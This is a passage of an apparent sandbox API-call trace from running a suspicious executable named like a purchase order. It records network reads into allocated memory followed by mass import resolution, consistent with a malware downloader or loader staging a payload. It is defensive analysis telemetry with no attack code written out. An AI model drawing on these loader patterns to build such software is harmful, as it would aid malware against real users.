lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.534] VirtualAlloc (lpAddress=0x3630000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x3630000 [0099.538] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.543] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.546] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.547] VirtualAlloc (lpAddress=0x3630000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x3630000 [0099.551] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0101.995] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0101.996] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0101.996] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x35b0000 [0101.997] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x8c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0106.244] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x743f0000 [0106.245] GetProcAddress (hModule=0x743f0000, lpProcName="SysFreeString") returned 0x74409d40 [0106.246] GetProcAddress (hModule=0x743f0000, lpProcName="SysReAllocStringLen") returned 0x744049e0 [0106.246] GetProcAddress (hModule=0x743f0000, lpProcName="SysAllocStringLen") returned 0x74409c00 [0106.246] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76a90000 [0106.246] GetProcAddress (hModule=0x76a90000, lpProcName="RegQueryValueExA") returned 0x76aaf500 [0106.246] GetProcAddress (hModule=0x76a90000, lpProcName="RegOpenKeyExA") returned 0x76aaf790 [0106.247] GetProcAddress (hModule=0x76a90000, lpProcName="RegCloseKey") returned 0x76aaf620 [0106.247] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76300000 [0106.247] GetProcAddress (hModule=0x76300000, lpProcName="GetKeyboardType") returned 0x7635cd00 [0106.247] GetProcAddress (hModule=0x76300000, lpProcName="DestroyWindow") returned 0x763392b0 [0106.247] GetProcAddress (hModule=0x76300000, lpProcName="LoadStringA") returned 0x7632fd20 [0106.248] GetProcAddress (hModule=0x76300000, lpProcName="MessageBoxA") returned 0x7637fec0 [0106.248] GetProcAddress (hModule=0x76300000, lpProcName="CharNextA") returned 0x7632e240 [0106.249] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74530000 [0106.249] GetProcAddress (hModule=0x74530000, lpProcName="GetACP") returned 0x74548500 [0106.249] GetProcAddress (hModule=0x74530000, lpProcName="Sleep") returned 0x74547990 [0106.250] GetProcAddress (hModule=0x74530000, lpProcName="VirtualFree") returned 0x74547600 [0106.250] GetProcAddress (hModule=0x74530000, lpProcName="VirtualAlloc") returned 0x74547810 [0106.250] GetProcAddress (hModule=0x74530000, lpProcName="GetTickCount") returned 0x74555eb0 [0106.250] GetProcAddress (hModule=0x74530000, lpProcName="QueryPerformanceCounter") returned 0x745438a0 [0106.250] GetProcAddress (hModule=0x74530000, lpProcName="GetCurrentThreadId") returned 0x74541b90 [0106.250] GetProcAddress (hModule=0x74530000, lpProcName="InterlockedDecrement") returned 0x74552a20 [0106.251] GetProcAddress (hModule=0x74530000, lpProcName="InterlockedIncrement") returned 0x74552a00 [0106.251] GetProcAddress (hModule=0x74530000, lpProcName="VirtualQuery") returned 0x74547a90 [0106.251] GetProcAddress (hModule=0x74530000, lpProcName="WideCharToMultiByte") returned 0x74543880 [0106.251] GetProcAddress (hModule=0x74530000, lpProcName="MultiByteToWideChar") returned 0x74542ad0 [0106.251] GetProcAddress (hModule=0x74530000, lpProcName="lstrlenA") returned 0x74548c80 [0106.252] GetProcAddress (hModule=0x74530000, lpProcName="lstrcpynA") returned 0x7454fe40 [0106.252] GetProcAddress (hModule=0x74530000, lpProcName="LoadLibraryExA") returned 0x7454a270 [0106.252] GetProcAddress (hModule=0x74530000, lpProcName="GetThreadLocale") returned 0x7454af90 [0106.252] GetProcAddress (hModule=0x74530000, lpProcName="GetStartupInfoA") returned 0x74549c10 [0106.252] GetProcAddress (hModule=0x74530000, lpProcName="GetProcAddress") returned 0x745478b0 [0106.252] GetProcAddress (hModule=0x74530000, lpProcName="GetModuleHandleA") returned 0x745499f0 [0106.253] GetProcAddress (hModule=0x74530000, lpProcName="GetModuleFileNameA") returned 0x7454a720 [0106.253] GetProcAddress (hModule=0x74530000, lpProcName="GetLocaleInfoA") returned 0x7454e7b0 [0106.253] GetProcAddress (hModule=0x74530000, lpProcName="GetLastError") returned 0x74543870 [0106.253] GetProcAddress (hModule=0x74530000, lpProcName="GetCommandLineA") returned 0x7454ab60 [0106.253] GetProcAddress (hModule=0x74530000, lpProcName="FreeLibrary") returned 0x74549f50 [0106.254] GetProcAddress (hModule=0x74530000, lpProcName="FindFirstFileA") returned 0x74556920 [0106.254] GetProcAddress (hModule=0x74530000, lpProcName="FindClose") returned 0x745568e0 [0106.254] GetProcAddress (hModule=0x74530000, lpProcName="ExitProcess") returned 0x74557b30 [0106.254] GetProcAddress (hModule=0x74530000, lpProcName="CompareStringA") returned 0x7454e1c0 [0106.254] GetProcAddress (hModule=0x74530000, lpProcName="WriteFile") returned 0x74556ca0 [0106.255] GetProcAddress (hModule=0x74530000, lpProcName="UnhandledExceptionFilter") returned 0x74572670 [0106.255] GetProcAddress (hModule=0x74530000, lpProcName="SetFilePointer") returned 0x74556c40 [0106.255] GetProcAddress (hModule=0x74530000, lpProcName="SetEndOfFile") returned 0x74556c00 [0106.255] GetProcAddress (hModule=0x74530000, lpProcName="RtlUnwind") returned 0x74548c10 [0106.255] GetProcAddress (hModule=0x74530000, lpProcName="ReadFile") returned 0x74556bb0 [0106.255] GetProcAddress (hModule=0x74530000, lpProcName="RaiseException") returned 0x74548c20 [0106.256] GetProcAddress (hModule=0x74530000, lpProcName="GetStdHandle") returned 0x7454a6e0 [0106.256] GetProcAddress (hModule=0x74530000, lpProcName="GetFileSize") returned 0x74556a70 [0106.256] GetProcAddress (hModule=0x74530000, lpProcName="GetFileType") returned 0x74556aa0 [0106.256] GetProcAddress (hModule=0x74530000, lpProcName="CreateFileA") returned 0x74556880 [0106.256] GetProcAddress (hModule=0x74530000, lpProcName="CloseHandle") returned 0x74556630 [0106.256] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74530000 [0106.257] GetProcAddress (hModule=0x74530000, lpProcName="TlsSetValue") returned 0x745429d0 [0106.257] GetProcAddress (hModule=0x74530000, lpProcName="TlsGetValue") returned 0x74541b70 [0106.257] GetProcAddress (hModule=0x74530000, lpProcName="TlsFree") returned 0x7454a040 [0106.257] GetProcAddress (hModule=0x74530000, lpProcName="TlsAlloc") returned 0x7454a120 [0106.258] GetProcAddress (hModule=0x74530000, lpProcName="LocalFree") returned 0x745479a0 [0106.258] GetProcAddress (hModule=0x74530000, lpProcName="LocalAlloc") returned 0x74547a30 [0106.258] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76300000 [0106.258] GetProcAddress (hModule=0x76300000, lpProcName="CreateWindowExA") returned 0x76336f30 [0106.258] GetProcAddress (hModule=0x76300000, lpProcName="WindowFromPoint") returned 0x76338a30 [0106.259] GetProcAddress (hModule=0x76300000, lpProcName="WaitMessage") returned 0x763389b0 [0106.259] GetProcAddress (hModule=0x76300000, lpProcName="UpdateWindow") returned 0x763283a0 [0106.259] GetProcAddress (hModule=0x76300000, lpProcName="UnregisterClassA") returned 0x763362b0 [0106.259] GetProcAddress (hModule=0x76300000, lpProcName="UnhookWindowsHookEx") returned 0x76338fe0 [0106.259] GetProcAddress (hModule=0x76300000, lpProcName="TranslateMessage") returned 0x7631d9b0 [0106.260] GetProcAddress (hModule=0x76300000, lpProcName="TranslateMDISysAccel") returned 0x7637d590 [0106.260] GetProcAddress (hModule=0x76300000, lpProcName="TrackPopupMenu") returned 0x76334b30 [0106.260] GetProcAddress (hModule=0x76300000, lpProcName="SystemParametersInfoA") returned 0x763327c0 [0106.260] GetProcAddress (hModule=0x76300000, lpProcName="ShowWindow") returned 0x76338e60 [0106.260] GetProcAddress (hModule=0x76300000, lpProcName="ShowScrollBar") returned 0x76338cc0 [0106.260] GetProcAddress (hModule=0x76300000, lpProcName="ShowOwnedPopups") returned 0x76334f10 [0106.261] GetProcAddress (hModule=0x76300000, lpProcName="SetWindowsHookExA") returned 0x76334010 [0106.261] GetProcAddress (hModule=0x76300000, lpProcName="SetWindowPos") returned 0x76338b30 [0106.261] GetProcAddress (hModule=0x76300000, lpProcName="SetWindowPlacement") returned 0x76339700 [0106.262] GetProcAddress (hModule=0x76300000, lpProcName="SetWindowLongW") returned 0x76313780 [0106.262] GetProcAddress (hModule=0x76300000, lpProcName="SetWindowLongA") returned 0x76336f80 [0106.262] GetProcAddress (hModule=0x76300000, lpProcName="SetTimer") returned 0x7631ee50 [0106.262] GetProcAddress (hModule=0x76300000, lpProcName="SetScrollRange") returned 0x76325820 [0106.262] GetProcAddress (hModule=0x76300000, lpProcName="SetScrollPos") returned 0x76328600 [0106.263] GetProcAddress (hModule=0x76300000, lpProcName="SetScrollInfo") returned 0x76327c40 [0106.263] GetProcAddress (hModule=0x76300000, lpProcName="SetRect") returned 0x763361f0 [0106.263] GetProcAddress (hModule=0x76300000, lpProcName="SetPropA") returned 0x763331f0 [0106.263] GetProcAddress (hModule=0x76300000, lpProcName="SetParent") returned 0x76339050 [0106.264] GetProcAddress (hModule=0x76300000, lpProcName="SetMenuItemInfoA") returned 0x763893a0 [0106.264] GetProcAddress (hModule=0x76300000, lpProcName="SetMenu") returned 0x76334320 [0106.264] GetProcAddress (hModule=0x76300000, lpProcName="SetForegroundWindow") returned 0x76320030 [0106.264] GetProcAddress (hModule=0x76300000, lpProcName="SetFocus") returned 0x76338e00 [0106.264] GetProcAddress (hModule=0x76300000, lpProcName="SetCursor") returned 0x76338a90 [0106.265] GetProcAddress (hModule=0x76300000, lpProcName="SetClassLongA") returned 0x763349e0 [0106.265] GetProcAddress (hModule=0x76300000, lpProcName="SetCapture") returned 0x76338d80 [0106.265] GetProcAddress (hModule=0x76300000, lpProcName="SetActiveWindow") returned 0x763396e0 [0106.265] GetProcAddress (hModule=0x76300000, lpProcName="SendMessageW") returned 0x76315d90 [0106.265] GetProcAddress (hModule=0x76300000, lpProcName="SendMessageA") returned 0x7632a220 [0106.266] GetProcAddress (hModule=0x76300000, lpProcName="ScrollWindow") returned 0x76333d10 [0106.266] GetProcAddress (hModule=0x76300000, lpProcName="ScreenToClient") returned 0x76317790 [0106.266] GetProcAddress (hModule=0x76300000, lpProcName="RemovePropA") returned 0x76333330 [0106.266] GetProcAddress (hModule=0x76300000, lpProcName="RemoveMenu") returned 0x76339880 [0106.266] GetProcAddress (hModule=0x76300000, lpProcName="ReleaseDC") returned 0x7631ba40 [0106.266] GetProcAddress (hModule=0x76300000, lpProcName="ReleaseCapture") returned 0x763335e0 [0106.267] GetProcAddress (hModule=0x76300000, lpProcName="RegisterWindowMessageA") returned 0x76336710 [0106.267] GetProcAddress (hModule=0x76300000, lpProcName="RegisterClipboardFormatA") returned 0x76336710 [0106.267] GetProcAddress (hModule=0x76300000, lpProcName="RegisterClassA") returned 0x763363d0 [0106.267] GetProcAddress (hModule=0x76300000, lpProcName="RedrawWindow") returned 0x76338a20 [0106.267] GetProcAddress (hModule=0x76300000, lpProcName="PtInRect") returned 0x76317b90 [0106.268] GetProcAddress (hModule=0x76300000, lpProcName="PostQuitMessage") returned 0x763372f0 [0106.268] GetProcAddress (hModule=0x76300000, lpProcName="PostMessageA") returned 0x7632f0e0 [0106.268] GetProcAddress (hModule=0x76300000, lpProcName="PeekMessageW") returned 0x7631cc00 [0106.268] GetProcAddress (hModule=0x76300000, lpProcName="PeekMessageA") returned 0x7631ca40 [0106.269] GetProcAddress (hModule=0x76300000, lpProcName="OffsetRect") returned 0x763350c0 [0106.269] GetProcAddress (hModule=0x76300000, lpProcName="OemToCharA") returned 0x76382e60 [0106.269] GetProcAddress (hModule=0x76300000, lpProcName="MessageBoxA") returned 0x7637fec0 [0106.269] GetProcAddress (hModule=0x76300000, lpProcName="MapWindowPoints") returned 0x76313e60 [0106.269] GetProcAddress (hModule=0x76300000, lpProcName="MapVirtualKeyA") returned 0x76333e20 [0106.269] GetProcAddress (hModule=0x76300000, lpProcName="LoadStringA") returned 0x7632fd20 [0106.270] GetProcAddress (hModule=0x76300000, lpProcName="LoadKeyboardLayoutA") returned 0x7635d920 [0106.270] GetProcAddress (hModule=0x76300000, lpProcName="LoadIconA") returned 0x76333dd0 [0106.270] GetProcAddress (hModule=0x76300000, lpProcName="LoadCursorA") returned 0x76336ea0 [0106.270] GetProcAddress (hModule=0x76300000, lpProcName="LoadBitmapA") returned 0x763223c0 [0106.270] GetProcAddress (hModule=0x76300000, lpProcName="KillTimer") returned 0x76338aa0 [0106.270] GetProcAddress (hModule=0x76300000, lpProcName="IsZoomed") returned 0x76336a10 [0106.271] GetProcAddress (hModule=0x76300000, lpProcName="IsWindowVisible") returned 0x76335960 [0106.271] GetProcAddress (hModule=0x76300000, lpProcName="IsWindowUnicode") returned 0x7632de60 [0106.271] GetProcAddress (hModule=0x76300000, lpProcName="IsWindowEnabled") returned 0x76314710 [0106.271] GetProcAddress (hModule=0x76300000, lpProcName="IsWindow") returned 0x76318f70 [0106.271] GetProcAddress (hModule=0x76300000, lpProcName="IsRectEmpty") returned 0x7631e260 [0106.272] GetProcAddress (hModule=0x76300000, lpProcName="IsIconic") returned 0x76336230 [0106.272] GetProcAddress (hModule=0x76300000, lpProcName="IsDialogMessageW") returned 0x76329b00 [0106.272] GetProcAddress (hModule=0x76300000, lpProcName="IsDialogMessageA") returned 0x76329810 [0106.272] GetProcAddress (hModule=0x76300000, lpProcName="IsChild") returned 0x76316ec0 [0106.272] GetProcAddress (hModule=0x76300000, lpProcName="InvalidateRect") returned 0x76338930 [0106.272] GetProcAddress (hModule=0x76300000, lpProcName="IntersectRect") returned 0x76328140 [0106.273] GetProcAddress (hModule=0x76300000, lpProcName="InsertMenuItemA") returned 0x76389310 [0106.273] GetProcAddress (hModule=0x76300000, lpProcName="InsertMenuA") returned 0x763892c0 [0106.273] GetProcAddress (hModule=0x76300000, lpProcName="InflateRect") returned 0x76336a90 [0106.273] GetProcAddress (hModule=0x76300000, lpProcName="GetWindowThreadProcessId") returned 0x7631da50 [0106.273] GetProcAddress (hModule=0x76300000, lpProcName="GetWindowTextA") returned 0x7632caa0 [0106.274] GetProcAddress (hModule=0x76300000, lpProcName="GetWindowRect") returned 0x76314140 [0106.274] GetProcAddress (hModule=0x76300000, lpProcName="GetWindowPlacement") returned 0x76339630 [0106.274] GetProcAddress (hModule=0x76300000, lpProcName="GetWindowLongW") returned 0x76316fa0 [0106.274] GetProcAddress (hModule=0x76300000, lpProcName="GetWindowLongA") returned 0x7632df10 [0106.274] GetProcAddress (hModule=0x76300000, lpProcName="GetWindowDC") returned 0x76338f20 [0106.274] GetProcAddress (hModule=0x76300000, lpProcName="GetTopWindow") returned 0x7632da70 [0106.275] GetProcAddress (hModule=0x76300000, lpProcName="GetSystemMetrics") returned 0x76319160 [0106.275] GetProcAddress (hModule=0x76300000, lpProcName="GetSystemMenu") returned 0x76338ef0 [0106.275] GetProcAddress (hModule=0x76300000, lpProcName="GetSysColorBrush") returned 0x76336e40 [0106.275] GetProcAddress (hModule=0x76300000, lpProcName="GetSysColor") returned 0x7631e7f0 [0106.275] GetProcAddress (hModule=0x76300000, lpProcName="GetSubMenu") returned 0x76321fa0 [0106.275] GetProcAddress (hModule=0x76300000, lpProcName="GetScrollRange") returned 0x763337d0 [0106.276] GetProcAddress (hModule=0x76300000, lpProcName="GetScrollPos") returned 0x76331b40 [0106.276] GetProcAddress (hModule=0x76300000, lpProcName="GetScrollInfo") returned 0x7632f170 [0106.276] GetProcAddress (hModule=0x76300000, lpProcName="GetPropA") returned 0x7632fcd0 [0106.276] GetProcAddress (hModule=0x76300000, lpProcName="GetParent") returned 0x7631d770 [0106.276] GetProcAddress (hModule=0x76300000, lpProcName="GetWindow") returned 0x7631d570 [0106.276] GetProcAddress (hModule=0x76300000, lpProcName="GetMessagePos") returned 0x76331bd0 [0106.277] GetProcAddress (hModule=0x76300000, lpProcName="GetMenuStringA") returned 0x76389130 [0106.277] GetProcAddress (hModule=0x76300000, lpProcName="GetMenuState") returned 0x76321680 [0106.277] GetProcAddress (hModule=0x76300000, lpProcName="GetMenuItemInfoA") returned 0x76320720 [0106.277] GetProcAddress (hModule=0x76300000, lpProcName="GetMenuItemID") returned 0x76322140 [0106.277] GetProcAddress (hModule=0x76300000, lpProcName="GetMenuItemCount") returned 0x76322070 [0106.277] GetProcAddress (hModule=0x76300000, lpProcName="GetMenu") returned 0x763220b0 [0106.278] GetProcAddress (hModule=0x76300000, lpProcName="GetLastActivePopup") returned 0x76332260 [0106.278] GetProcAddress (hModule=0x76300000, lpProcName="GetKeyboardState") returned 0x76339060 [0106.278] GetProcAddress (hModule=0x76300000, lpProcName="GetKeyboardLayoutNameA") returned 0x76389be0 [0106.278] GetProcAddress (hModule=0x76300000, lpProcName="GetKeyboardLayoutList") returned 0x76338e70 [0106.278] GetProcAddress (hModule=0x76300000, lpProcName="GetKeyboardLayout") returned 0x7631ef20 [0106.278] GetProcAddress (hModule=0x76300000, lpProcName="GetKeyState") returned 0x7631ddd0 [0106.279] GetProcAddress (hModule=0x76300000, lpProcName="GetKeyNameTextA") returned 0x76389b70 [0106.279] GetProcAddress (hModule=0x76300000, lpProcName="GetIconInfo") returned 0x76330160 [0106.279] GetProcAddress (hModule=0x76300000, lpProcName="GetForegroundWindow") returned 0x76338cb0 [0106.279] GetProcAddress (hModule=0x76300000, lpProcName="GetFocus") returned 0x7631edb0 [0106.279] GetProcAddress (hModule=0x76300000, lpProcName="GetDesktopWindow") returned 0x76313470 [0106.279] GetProcAddress (hModule=0x76300000, lpProcName="GetDCEx") returned 0x76339200 [0106.279] GetProcAddress (hModule=0x76300000, lpProcName="GetDC") returned 0x76338990 [0106.280] GetProcAddress (hModule=0x76300000, lpProcName="GetCursorPos") returned 0x7632f6c0 [0106.280] GetProcAddress (hModule=0x76300000, lpProcName="GetCursor") returned 0x76332850 [0106.280] GetProcAddress (hModule=0x76300000, lpProcName="GetClientRect") returned 0x763159f0 [0106.280] GetProcAddress (hModule=0x76300000, lpProcName="GetClassLongA") returned 0x76331cd0 [0106.281] GetProcAddress (hModule=0x76300000, lpProcName="GetClassInfoA") returned 0x76331050 [0106.281] GetProcAddress (hModule=0x76300000, lpProcName="GetCapture") returned 0x7632cd60 [0106.281] GetProcAddress (hModule=0x76300000, lpProcName="GetActiveWindow") returned 0x76332840 [0106.281] GetProcAddress (hModule=0x76300000, lpProcName="FrameRect") returned 0x76331f50 [0106.281] GetProcAddress (hModule=0x76300000, lpProcName="FindWindowA") returned 0x76332900 [0106.282] GetProcAddress (hModule=0x76300000, lpProcName="FillRect") returned 0x763240b0 [0106.282] GetProcAddress (hModule=0x76300000, lpProcName="EqualRect") returned 0x7632ded0 [0106.282] GetProcAddress (hModule=0x76300000, lpProcName="EnumWindows") returned 0x76333a60 [0106.282] GetProcAddress (hModule=0x76300000, lpProcName="EnumThreadWindows") returned 0x76335f80 [0106.282] GetProcAddress (hModule=0x76300000, lpProcName="EnumChildWindows") returned 0x76335fb0 [0106.282] GetProcAddress (hModule=0x76300000, lpProcName="EndPaint") returned 0x76338a80 [0106.283] GetProcAddress (hModule=0x76300000, lpProcName="EnableWindow") returned 0x763329d0 [0106.283] GetProcAddress (hModule=0x76300000, lpProcName="EnableScrollBar") returned 0x76384d10 [0106.283] GetProcAddress (hModule=0x76300000, lpProcName="EnableMenuItem") returned 0x763207d0 [0106.283] GetProcAddress (hModule=0x76300000, lpProcName="DrawTextA") returned 0x763235f0 [0106.283] GetProcAddress (hModule=0x76300000, lpProcName="DrawMenuBar") returned 0x76333ee0 [0106.284] GetProcAddress (hModule=0x76300000, lpProcName="DrawIconEx") returned 0x7632f710 [0106.284] GetProcAddress (hModule=0x76300000, lpProcName="DrawIcon") returned 0x7632f6e0 [0106.284] GetProcAddress (hModule=0x76300000, lpProcName="DrawFrameControl") returned 0x76333610 [0106.284] GetProcAddress (hModule=0x76300000, lpProcName="DrawEdge") returned 0x76322cb0 [0106.284] GetProcAddress (hModule=0x76300000, lpProcName="DispatchMessageW") returned 0x763162e0 [0106.284] GetProcAddress (hModule=0x76300000, lpProcName="DispatchMessageA") returned 0x76336f10 [0106.285] GetProcAddress (hModule=0x76300000, lpProcName="DestroyWindow") returned 0x763392b0 [0106.285] GetProcAddress (hModule=0x76300000, lpProcName="DestroyMenu") returned 0x763396b0 [0106.285] GetProcAddress (hModule=0x76300000, lpProcName="DestroyIcon") returned 0x7631f880 [0106.285] GetProcAddress (hModule=0x76300000, lpProcName="DestroyCursor") returned 0x7631f880 [0106.285] GetProcAddress (hModule=0x76300000, lpProcName="DeleteMenu") returned 0x763394a0 [0106.285] GetProcAddress (hModule=0x76300000, lpProcName="DefWindowProcA") returned 0x772eaed0 [0106.286] GetProcAddress (hModule=0x76300000, lpProcName="DefMDIChildProcA") returned 0x76320860 [0106.286] GetProcAddress (hModule=0x76300000, lpProcName="DefFrameProcA") returned 0x763231e0 [0106.286] GetProcAddress (hModule=0x76300000, lpProcName="CreatePopupMenu") returned 0x76334ec0 [0106.286] GetProcAddress (hModule=0x76300000, lpProcName="CreateMenu") returned 0x76334bb0 [0106.286] GetProcAddress (hModule=0x76300000, lpProcName="CreateIcon") returned 0x76360520 [0106.286] GetProcAddress (hModule=0x76300000, lpProcName="ClientToScreen") returned 0x763148a0 [0106.287] GetProcAddress (hModule=0x76300000, lpProcName="CheckMenuItem") returned 0x76321420 [0106.287] GetProcAddress (hModule=0x76300000, lpProcName="CallWindowProcA") returned 0x7632dc60 [0106.287] GetProcAddress (hModule=0x76300000, lpProcName="CallNextHookEx") returned 0x76313550 [0106.287] GetProcAddress (hModule=0x76300000, lpProcName="BeginPaint") returned 0x76338a60 [0106.287] GetProcAddress (hModule=0x76300000, lpProcName="CharNextA") returned 0x7632e240 [0106.287] GetProcAddress (hModule=0x76300000, lpProcName="CharLowerA") returned 0x763348e0 [0106.288] GetProcAddress (hModule=0x76300000, lpProcName="CharToOemA") returned 0x76382cf0 [0106.288] GetProcAddress (hModule=0x76300000, lpProcName="AdjustWindowRectEx") returned 0x7632f230 [0106.288] GetProcAddress (hModule=0x76300000, lpProcName="ActivateKeyboardLayout") returned 0x76339ac0 [0106.288] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x76010000 [0106.288] GetProcAddress (hModule=0x76010000, lpProcName="UnrealizeObject") returned 0x760c36e0 [0106.289] GetProcAddress (hModule=0x76010000, lpProcName="StretchBlt") returned 0x760bf810 [0106.289] GetProcAddress (hModule=0x76010000, lpProcName="SetWindowOrgEx") returned 0x760b5990 [0106.289] GetProcAddress (hModule=0x76010000, lpProcName="SetViewportOrgEx") returned 0x760b5880 [0106.289] GetProcAddress (hModule=0x76010000, lpProcName="SetTextColor") returned 0x76091d00 [0106.289] GetProcAddress (hModule=0x76010000, lpProcName="SetStretchBltMode") returned 0x760932e0 [0106.290] GetProcAddress (hModule=0x76010000, lpProcName="SetROP2") returned 0x760b5450 [0106.290] GetProcAddress (hModule=0x76010000, lpProcName="SetPixel") returned 0x760c5490 [0106.290] GetProcAddress (hModule=0x76010000, lpProcName="SetDIBColorTable") returned 0x760f7720 [0106.290] GetProcAddress (hModule=0x76010000, lpProcName="SetBrushOrgEx") returned 0x760b5230 [0106.290] GetProcAddress (hModule=0x76010000, lpProcName="SetBkMode") returned 0x760920d0 [0106.290] GetProcAddress (hModule=0x76010000, lpProcName="SetBkColor") returned 0x76091e20 [0106.291] GetProcAddress (hModule=0x76010000, lpProcName="SelectPalette") returned 0x760c5b50 [0106.291] GetProcAddress (hModule=0x76010000, lpProcName="SelectObject") returned 0x76090440 [0106.291] GetProcAddress (hModule=0x76010000, lpProcName="SaveDC") returned 0x760c6070 [0106.291] GetProcAddress (hModule=0x76010000, lpProcName="RestoreDC") returned 0x760c5db0 [0106.291] GetProcAddress (hModule=0x76010000, lpProcName="RectVisible") returned 0x760c0850 [0106.292] GetProcAddress (hModule=0x76010000, lpProcName="RealizePalette") returned 0x760c12e0 [0106.292] GetProcAddress (hModule=0x76010000, lpProcName="PatBlt") returned 0x760b7080 [0106.292] GetProcAddress (hModule=0x76010000, lpProcName="MoveToEx") returned 0x760ad3a0 [0106.292] GetProcAddress (hModule=0x76010000, lpProcName="MaskBlt") returned 0x760f6b60 [0106.292] GetProcAddress (hModule=0x76010000, lpProcName="LineTo") returned 0x760b91b0 [0106.292] GetProcAddress (hModule=0x76010000, lpProcName="IntersectClipRect") returned 0x760be990 [0106.293] GetProcAddress (hModule=0x76010000, lpProcName="GetWindowOrgEx") returned 0x760b56c0 [0106.293] GetProcAddress (hModule=0x76010000, lpProcName="GetTextMetricsA") returned 0x760ac320 [0106.293] GetProcAddress (hModule=0x76010000, lpProcName="GetTextExtentPoint32A") returned 0x760bcf10 [0106.294] GetProcAddress (hModule=0x76010000, lpProcName="GetSystemPaletteEntries") returned 0x760c35e0 [0106.294] GetProcAddress (hModule=0x76010000, lpProcName="GetStockObject") returned 0x76092550 [0106.294] GetProcAddress (hModule=0x76010000, lpProcName="GetRgnBox") returned 0x760b0dd0 [0106.294] GetProcAddress (hModule=0x76010000, lpProcName="GetPixel") returned 0x760c3770 [0106.294] LoadLibraryA (lpLibFileName="version.dll") returned 0x6cd30000 [0106.295] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74530000 [0106.295] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76a90000 [0106.295] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74530000 [0106.295] LoadLibraryA (lpLibFileName="ntdll") returned 0x77260000 [0106.296] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x743f0000 [0106.296] LoadLibraryA (lpLibFileName="comctl32.dll") returned 0x6cc90000 [0106.297] LocalAlloc (uFlags=0x40, uBytes=0x34) returned 0x892008 [0106.297] GetKeyboardType (nTypeFlag=0) returned 4 [0106.300] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe\" " [0106.300] GetStartupInfoA (in: lpStartupInfo=0x29cfbc0 | out: lpStartupInfo=0x29cfbc0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0106.300] GetACP () returned 0x4e4 [0106.300] GetCurrentThreadId () returned 0x674 [0106.300] GetModuleFileNameA (in: hModule=0x38b0000, lpFilename=0x29ceab0, nSize=0x105 | out: lpFilename="") returned 0x0 [0106.300] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x29ce98b, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\po-003785gmhn.exe")) returned 0x2f [0106.300] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x29ceaa0 | out: phkResult=0x29ceaa0*=0x0) returned 0x2 [0106.301] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x29ceaa0 | out: phkResult=0x29ceaa0*=0x0) returned 0x2 [0106.302] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x29ceaa0 | out: phkResult=0x29ceaa0*=0x0) returned 0x2 [0106.302] lstrcpynA (in: lpString1=0x29ce98b, lpString2="", iMaxLength=261 | out: lpString1="") returned="" [0106.302] GetThreadLocale () returned 0x409 [0106.302] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x29cea9b, cchData=5 | out: lpLCData="ENU") returned 4 [0106.302] LoadStringA (in: hInstance=0x38b0000, uID=0xffdf, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0106.302] VirtualAlloc (lpAddress=0x0, dwSize=0x140000, flAllocationType=0x1000, flProtect=0x4) returned 0x3950000 [0106.304] LoadStringA (in: hInstance=0x38b0000, uID=0xffde, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: 